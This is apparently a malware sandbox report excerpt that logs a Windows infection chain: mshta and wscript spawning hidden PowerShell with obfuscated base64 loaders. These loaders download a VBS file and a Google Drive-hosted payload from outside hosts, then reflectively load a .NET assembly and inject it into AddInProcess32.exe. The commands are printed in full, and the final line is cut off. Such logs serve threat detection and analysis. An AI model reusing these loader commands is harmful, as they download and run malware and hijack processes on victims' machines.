                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 415000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 41A000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 4A0000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exeJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgi0beg4icagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtvflqzsagicagicagicagicagicagicagicagicagicagicaglu1lbwjfcmrlzklosvrjb24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxtt24urgxmiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagihpsr2dqchbflhn0cmluzyagicagicagicagicagicagicagicagicagicagicagrflcbfcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbwsxlhvnusdwludcagicagicagicagicagicagicagicagicagicagicagayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagie9jvgloslj5wsk7jyagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicjtiiagicagicagicagicagicagicagicagicagicagicaglw5btuvtuefjrsagicagicagicagicagicagicagicagicagicagicagwxdvqmnht2duasagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjgi0beg4ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc2lje0ms8zns9lzhvjyxrpb25hbhroaw5nc3dpdghncmvhdgf0dgl0dwrlb25ozxjllnrjriisiirftny6qvbqrefuqvxlzhvjyxrpb25hbhroaw5nc3dpdghncmvhdgf0dgl0dwrlb25ozxjllnziuyismcwwkttzdgfsvc1zbevlucgzkttzvgfsvcagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvxlzhvjyxrpb25hbhroaw5nc3dpdghncmvhdgf0dgl0dwrlb25ozxjllnziuyi='+[char]0x22+'))')))"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrftny6q29tu3blq1s0lde1ldi1xs1kb0lujycpkcaojzbrywltywdlvxjsid0gzjdwahqnkyd0chm6ly8nkydkcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlvoqll3dscrj3igzjdwozbryxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7mffhaw1hz2vcexrlcya9idbryxdlyknsawvudc5eb3dubg9hzerhdgeomffhaw1hz2vvcmwnkycpoycrjzbrywltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkdbrywltywdlqnl0zxmpozbryxn0yxj0rmxhzya9igy3vjw8qkftrty0x1nuqvjupj5mn1y7mffhzw5krmxhzya9igy3vjw8qkftrty0x0vord4+zjdwoycrjzbryxn0yxj0sw5kzxggpsawuwfpbwfnjysnzvrlehqusw5kzxhpzigwuwfzdgfyjysndezsywcpozbrywvuzeluzgv4id0nkycgmffhaw1hz2vuzxh0lkluzgv4t2yomffhzw5krmxhzyk7mffhc3rhcnrjbmrlecatz2ugmcatjysnyw5kidbrywvuzeluzgv4ic1ndcawuwfzdgfydeluzgv4ozbryxn0yxj0sw5kzxggkz0gmffhc3rhcnrgbgfnlkxlbmd0adswuwfijysnyxnlnjrmzw5ndgggjysnpsawuwflbmrjbmrlecatidbryxn0yxj0sw5kzxg7mccrj1fhymfzzty0q29tbwfuzca9idbrywltywdlvgv4dc5tdwjzdhjpbmcomffhc3rhcnrjbmrlecwgmffhymfzzscrjzy0tgvuz3roktswuwfiyxnlnjrszxzlcnnljysnzca9ic1qb2luicgwuwfiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgwwjjiezvckvhy2gtt2jqzwn0ihsgmffhxyb9kvstms4ulsgwuwfiyxnlnjrdb21tyscrj25klkxlbmd0acldozbrywnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcomffhymfzzty0umv2zxjzzwqpozbrywxvywrlzefzjysnc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6jysntg9hzcgwuwfjb21tyw5kqnl0zxmpozbryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qozjdwvkfjzjdwktswuwf2ywlnzxrob2qusw52b2tlkdbryw51bgwsieaozjdwdhh0lljsrvbmtvmvntmvmtqxljy3ms4zlji5ms8vonb0dghmn1ysigy3vmrlc2f0axzhzg9mn1ysigy3vmrlc2f0axzhzg9mn1ysigy3vmrlc2f0axzhzg9mn1ysigynkyc3vkfkzeluuhjvy2vzczmyzjdwlcbmn1zkzxnhdccrj2l2ywrvzjdwlcbmn1zkzxmnkydhdgl2ywrvzjdwlgy3vmrlc2f0axzhzg9mn1ysjysnzjdwzgvzyxrpdmfkb2y3vixmn1zkzxnhdgknkyd2ywrvzjdwjysnlgy3vmrlc2f0jysnaxzhzg9mn1yszjdwzgvzyxrpdmfkb2y3vixmn1yxzjdwlgy3vmrlc2f0axzhzg9mn1ypktsnks5szxbsqunfkchby2hbcl04ostby2hbcl05octby2hbcl03myksj3wnks5szxbsqunfkcdmn1ynlfttdhjjtkddw2noqxjdmzkplljlcgxbq0uokftjaefyxtq4k1tjaefyxtgxk1tjaefyxtk3kswnjccpick=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'')( ('0qaimageurl = f7vht'+'tps://'+'drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywu'+'r f7v;0qawebclient = new-object system.net.webclient;0qaimagebytes = 0qawebclient.downloaddata(0qaimageurl'+');'+'0qaimagetext = [system.text.encoding]::utf8.getstring(0qaimagebytes);0qastartflag = f7v<<base64_start>>f7v;0qaendflag = f7v<<base64_end>>f7v;'+'0qastartindex = 0qaimag'+'etext.indexof(0qastar'+'tflag);0qaendindex ='+' 0qaimagetext.indexof(0qaendflag);0qastartindex -ge 0 -'+'and 0qaendindex -gt 0qastartindex;0qastartindex += 0qastartflag.length;0qab'+'ase64length '+'= 0qaendindex - 0qastartindex;0'+'qabase64command = 0qaimagetext.substring(0qastartindex, 0qabase'+'64length);0qabase64reverse'+'d = -join (0qabase64command.tochararray() ybi foreach-object { 0qa_ })[-1..-(0qabase64comma'+'nd.length)];0qacommandbytes = [system.convert]::frombase64string(0qabase64reversed);0qaloadedas'+'sembly = [system.reflection.assembly]::'+'load(0qacommandbytes);0qavaimethod = [dnlib.io.home].getmethod(f7vvaif7v);0qavaimethod.invoke(0qanull, @(f7vtxt.rreplms/53/141.671.3.291//:ptthf7v, f7vdesativadof7v, f7vdesativadof7v, f7vdesativadof7v, f'+'7vaddinprocess32f7v, f7vdesat'+'ivadof7v, f7vdes'+'ativadof7v,f7vdesativadof7v,'+'f7vdesativadof7v,f7vdesati'+'vadof7v'+',f7vdesat'+'ivadof7v,f7vdesativadof7v,f7v1f7v,f7vdesativadof7v));').replace(([char]89+[char]98+[char]73),'|').replace('f7v',[string][char]39).replace(([char]48+[char]81+[char]97),'$') )"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgi0beg4icagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtvflqzsagicagicagicagicagicagicagicagicagicagicaglu1lbwjfcmrlzklosvrjb24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxtt24urgxmiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagihpsr2dqchbflhn0cmluzyagicagicagicagicagicagicagicagicagicagicagrflcbfcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbwsxlhvnusdwludcagicagicagicagicagicagicagicagicagicagicagayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagie9jvgloslj5wsk7jyagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicjtiiagicagicagicagicagicagicagicagicagicagicaglw5btuvtuefjrsagicagicagicagicagicagicagicagicagicagicagwxdvqmnht2duasagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjgi0beg4ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc2lje0ms8zns9lzhvjyxrpb25hbhroaw5nc3dpdghncmvhdgf0dgl0dwrlb25ozxjllnrjriisiirftny6qvbqrefuqvxlzhvjyxrpb25hbhroaw5nc3dpdghncmvhdgf0dgl0dwrlb25ozxjllnziuyismcwwkttzdgfsvc1zbevlucgzkttzvgfsvcagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvxlzhvjyxrpb25hbhroaw5nc3dpdghncmvhdgf0dgl0dwrlb25ozxjllnziuyi='+[char]0x22+'))')))"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrftny6q29tu3blq1s0lde1ldi1xs1kb0lujycpkcaojzbrywltywdlvxjsid0gzjdwahqnkyd0chm6ly8nkydkcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlvoqll3dscrj3igzjdwozbryxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7mffhaw1hz2vcexrlcya9idbryxdlyknsawvudc5eb3dubg9hzerhdgeomffhaw1hz2vvcmwnkycpoycrjzbrywltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkdbrywltywdlqnl0zxmpozbryxn0yxj0rmxhzya9igy3vjw8qkftrty0x1nuqvjupj5mn1y7mffhzw5krmxhzya9igy3vjw8qkftrty0x0vord4+zjdwoycrjzbryxn0yxj0sw5kzxggpsawuwfpbwfnjysnzvrlehqusw5kzxhpzigwuwfzdgfyjysndezsywcpozbrywvuzeluzgv4id0nkycgmffhaw1hz2vuzxh0lkluzgv4t2yomffhzw5krmxhzyk7mffhc3rhcnrjbmrlecatz2ugmcatjysnyw5kidbrywvuzeluzgv4ic1ndcawuwfzdgfydeluzgv4ozbryxn0yxj0sw5kzxggkz0gmffhc3rhcnrgbgfnlkxlbmd0adswuwfijysnyxnlnjrmzw5ndgggjysnpsawuwflbmrjbmrlecatidbryxn0yxj0sw5kzxg7mccrj1fhymfzzty0q29tbwfuzca9idbrywltywdlvgv4dc5tdwjzdhjpbmcomffhc3rhcnrjbmrlecwgmffhymfzzscrjzy0tgvuz3roktswuwfiyxnlnjrszxzlcnnljysnzca9ic1qb2luicgwuwfiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgwwjjiezvckvhy2gtt2jqzwn0ihsgmffhxyb9kvstms4ulsgwuwfiyxnlnjrdb21tyscrj25klkxlbmd0acldozbrywnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcomffhymfzzty0umv2zxjzzwqpozbrywxvywrlzefzjysnc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6jysntg9hzcgwuwfjb21tyw5kqnl0zxmpozbryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qozjdwvkfjzjdwktswuwf2ywlnzxrob2qusw52b2tlkdbryw51bgwsieaozjdwdhh0lljsrvbmtvmvntmvmtqxljy3ms4zlji5ms8vonb0dghmn1ysigy3vmrlc2f0axzhzg9mn1ysigy3vmrlc2f0axzhzg9mn1ysigy3vmrlc2f0axzhzg9mn1ysigynkyc3vkfkzeluuhjvy2vzczmyzjdwlcbmn1zkzxnhdccrj2l2ywrvzjdwlcbmn1zkzxmnkydhdgl2ywrvzjdwlgy3vmrlc2f0axzhzg9mn1ysjysnzjdwzg